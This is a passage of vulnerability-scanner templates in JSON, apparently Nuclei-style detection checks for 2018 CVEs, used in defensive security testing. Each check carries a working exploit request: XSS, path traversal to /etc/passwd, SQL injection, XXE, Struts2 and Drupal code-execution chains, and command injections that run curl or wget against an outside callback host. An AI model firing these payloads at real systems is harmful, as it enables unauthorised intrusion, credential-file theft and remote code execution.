application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-14931","info":{"name":"Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19326","info":{"name":"Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-12095","info":{"name":"OEcms 3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10736","info":{"name":"NagiosXI <= 5.4.12 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-8823","info":{"name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6605","info":{"name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+","matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(num)}}","dataexists"],"part":"body"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCodes 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site 